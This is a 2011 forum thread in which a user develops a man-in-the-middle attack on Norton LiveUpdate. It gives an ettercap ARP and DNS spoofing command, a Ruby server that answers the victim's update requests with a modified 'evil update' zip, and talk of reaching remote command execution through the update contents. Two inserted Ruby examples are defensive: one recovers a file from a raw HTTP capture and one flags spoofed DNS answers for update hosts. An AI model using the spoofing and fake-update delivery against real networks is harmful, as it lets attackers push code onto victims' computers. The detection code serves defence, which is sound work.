i8igmac Posted May 8, 2011

Maybe I could get someone's opinion. I have captured a GET request like /get symtec/id/dir/update.zip. I can reproduce this GET request with Ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents, but it fails. I hope to write my own evilgrade-style exploit. Right now I'm on my Droid; I will post this GET request and the binary data tonight. Any thoughts on how to properly handle this zip file, please share.
digip Posted May 8, 2011 (edited)

Are you sure the zip downloaded properly? They may cancel it if it doesn't use the same user agent Symantec uses to download it with, and it also might need an authentication hash or cookie of some sort to allow the download to work properly. Make sure you look at all the traffic with something like Wireshark, and see what the request user agent is, if it's a GET or POST, if it uses gzip encoding to download, etc. You could also just try navigating to the URL in your browser and see if it spits you the file.

Edited May 8, 2011 by digip
i8igmac (Author) Posted May 9, 2011

ettercap, filter to drop encryption for more plain text... I fixed my problem with extracting the file ,-) Instead of pasting to a text editor I just used nc (netcat):

    nc xxx.xxx.xx 80 > out.zip

    GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1
    If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT
    Cache-control: max-age=0
    Cache-Control: no-cache
    Cache-Control: max-stale=0
    Cache-Control: min-fresh=1000
    Accept: */*
    HOST: liveupdate.symantecliveupdate.com
    User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE
    Connection: Keep-Alive

I opened out.zip with a text editor and removed the response header field from the top of the file, and the file extracts just fine ,-)

I would really like to share more in-depth because this looks promising... One of the files' contents looks like this, one line:

    MOVE([TempDir],%StreamDefDir%)

I think this could give me sorta remote command execution. A quick test would be 'ping 192.168.1.101' (my laptop IP). I found this log someone posted and now it gives me a better view of what's going on...

hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt
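Added example (not part of the thread and not anyone's posted code): the header-stripping step above, done by parsing instead of by hand in a text editor. A raw response saved with nc still has the HTTP status line and headers in front of the zip, which is why it fails to extract. The code finds the blank line that ends the headers, trims the body to the declared Content-Length, and checks for the ZIP local-file-header signature, which is how a defender would pull a file out of a captured response for analysis. The function names and the sample response bytes are constructed for this example.

```ruby
# Added example (not from the thread): recover the file body from a raw HTTP
# response that was saved with its response headers still in front of it.
# Parses the header block, honours Content-Length when present, and checks
# the result against the ZIP local-file-header signature.

require 'stringio'

ZIP_MAGIC = "PK\x03\x04".b   # signature of the first local file header in a .zip

# Splits a raw response into [status_line, headers_hash, body].
# Accepts both CRLF and bare LF line endings, since captures vary.
def split_http_response(raw)
  raw = raw.b
  sep = raw.index("\r\n\r\n")
  if sep
    head, body = raw[0...sep], raw[(sep + 4)..-1]
  else
    sep = raw.index("\n\n") or raise ArgumentError, 'no end of headers found'
    head, body = raw[0...sep], raw[(sep + 2)..-1]
  end
  lines = head.split(/\r?\n/)
  status = lines.shift
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    next unless value
    headers[name.strip.downcase] = value.strip
  end
  [status, headers, body]
end

# Returns the recovered file bytes, truncated to Content-Length if the
# server declared one (trailing bytes from a keep-alive socket are dropped).
def recover_body(raw)
  _status, headers, body = split_http_response(raw)
  if headers['content-length']
    declared = headers['content-length'].to_i
    raise "short capture: #{body.bytesize} of #{declared} bytes" if body.bytesize < declared
    body = body[0, declared]
  end
  body
end

def looks_like_zip?(bytes)
  bytes.b.start_with?(ZIP_MAGIC)
end

# Constructed sample: a minimal response wrapping a fake zip body, followed
# by stray bytes that a keep-alive connection might leave behind.
FAKE_ZIP = (ZIP_MAGIC + "\x14\x00" + "constructed-zip-payload".b).b
SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: application/zip',
  "Content-Length: #{FAKE_ZIP.bytesize}",
  'Connection: keep-alive',
  '',
  ''
].join("\r\n").b + FAKE_ZIP + "extra bytes after the body".b

if __FILE__ == $0
  body = recover_body(SAMPLE_RESPONSE)
  puts "recovered #{body.bytesize} bytes, zip signature present: #{looks_like_zip?(body)}"
  # Real use: File.binwrite('update.zip', recover_body(File.binread('out.zip')))
end
```

The Content-Length trim matters with the Connection: keep-alive headers seen in the thread: anything the server sends after the declared length belongs to a later exchange, not to the file, and leaving it in is another reason an extractor can reject the archive.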
i8igmac (Author) Posted May 18, 2011

Here is a quick update on what I have done so far... I was going to make a video but I see no need... The client successfully downloads the modified zip file from my computer during the DNS spoof (screenshot of Wireshark). I just need to modify the zip package's contents to trigger execution...

    sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //

First thing is the ettercap filter drops encryption for more plaintext (not sure if it's needed for this situation but I like to use it).

    dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]

    sudo ruby exploit.rb

(It's something I put together in a few minutes, don't judge me ,-P)

    require 'socket'

    #SERVER
    server = TCPServer.open(80)
    loop {
      client = server.accept
      print client.read(100) #should receive /get /minitri.flg
      client.puts("HTTP/1.1 200 OK
    Content-Length: 1
    Content-Type: text/plain
    Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT
    ETag: "+'"'+"1-42ea9080"+'"'+"
    Accept-Ranges: bytes
    Date: Sun, 15 May 2011 01:52:21 GMT
    Connection: keep-alive
    Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r")
      print client.read(100) #should receive GET /update symnetc from client
      client.print("HTTP/1.1 200 OK
    Content-Type: application/zip
    Last-Modified: Sun, 15 May 2011 21:16:04 GMT
    ETag: W/"+'"'+"15a1-4dd04294"+'"'+"
    Accept-Ranges: bytes
    Date: Sun, 15 May 2011 20:50:18 GMT
    Connection: keep-alive
    Cache-Control: public,must-revalidate,max-age=240\n\r\n\r")
      #now send payload
      file = open('/home/bigmac/out.zip', "rb") # new evil update
      fileContent = file.read
      client.print(fileContent)
      #client.print "Closing the connection. Bye!"
      # client.close # Disconnect from the client
    }

Wireshark screenshot of the zip file downloaded, 192.168.1.102 <---> 192.168.1.104:
img838.imageshack.us/i/screenshotwireshark.png

I should post the zip file; I'm sure all that is needed is changing a few numbers around to trigger execution.
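Added example (not from the thread): the dns_spoof line above is also the detection signal. A public software-update host resolving to RFC1918, loopback or link-local space, or flipping to a different answer between two lookups from the same network, is what a resolver log should alert on. The log line format, the second hostname (updates.example.invalid), the function names and every address other than the thread's are constructed; only liveupdate.symantecliveupdate.com and 192.168.1.104 come from the post.

```ruby
# Added example (not from the thread): flag DNS answers that point an
# external update host at a local address, the symptom of the spoof above.
# Log format, watched placeholder host and most addresses are constructed.

require 'ipaddr'

# Address ranges that no public vendor update host should ever resolve to.
LOCAL_RANGES = %w[10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 127.0.0.0/8 169.254.0.0/16]
               .map { |r| IPAddr.new(r) }

# Hostnames whose resolution we care about (the thread's host plus a placeholder).
WATCHED_HOSTS = ['liveupdate.symantecliveupdate.com', 'updates.example.invalid']

# Constructed log line shape: "<date> <time> client=<ip> q=<name> a=<ip>"
LINE_RE = /\A(?<ts>\S+ \S+) client=(?<client>\S+) q=(?<name>\S+) a=(?<answer>\S+)\z/

def parse_dns_line(line)
  m = LINE_RE.match(line.strip) or return nil
  { ts: m[:ts], client: m[:client], name: m[:name].downcase, answer: m[:answer] }
end

def local_address?(ip)
  addr = IPAddr.new(ip)
  LOCAL_RANGES.any? { |range| range.include?(addr) }
rescue IPAddr::InvalidAddressError
  false
end

# Returns an array of alert hashes, one per suspicious answer: a watched host
# resolving into local space, or its answer changing between lookups.
def detect_spoofed_updates(lines)
  alerts = []
  last_answer = {}
  lines.each do |line|
    rec = parse_dns_line(line) or next
    next unless WATCHED_HOSTS.include?(rec[:name])
    if local_address?(rec[:answer])
      alerts << rec.merge(reason: 'update host resolved to local address space')
    end
    prev = last_answer[rec[:name]]
    if prev && prev != rec[:answer]
      alerts << rec.merge(reason: "answer changed from #{prev}")
    end
    last_answer[rec[:name]] = rec[:answer]
  end
  alerts
end

# Constructed resolver log: a benign LAN lookup, a normal answer for the
# update host, the spoofed answer, a second watched host, and a junk line.
SAMPLE_LOG = [
  '2011-05-18 20:40:51 client=192.168.1.102 q=www.example.invalid a=192.168.1.1',
  '2011-05-18 20:40:55 client=192.168.1.102 q=liveupdate.symantecliveupdate.com a=203.0.113.10',
  '2011-05-18 20:41:02 client=192.168.1.102 q=liveupdate.symantecliveupdate.com a=192.168.1.104',
  '2011-05-18 20:41:09 client=192.168.1.102 q=updates.example.invalid a=198.51.100.7',
  'garbage line that does not parse',
]

if __FILE__ == $0
  detect_spoofed_updates(SAMPLE_LOG).each do |a|
    puts "#{a[:ts]} #{a[:name]} -> #{a[:answer]} (#{a[:reason]})"
  end
end
```

The watchlist keeps the local-address rule from firing on ordinary LAN names (the first sample line resolves to a router address and is ignored). Both rules fire on the spoofed line, which is the behaviour you want: the address-space check catches a spoof on first sight, and the change check catches one that uses a public address you have not classified.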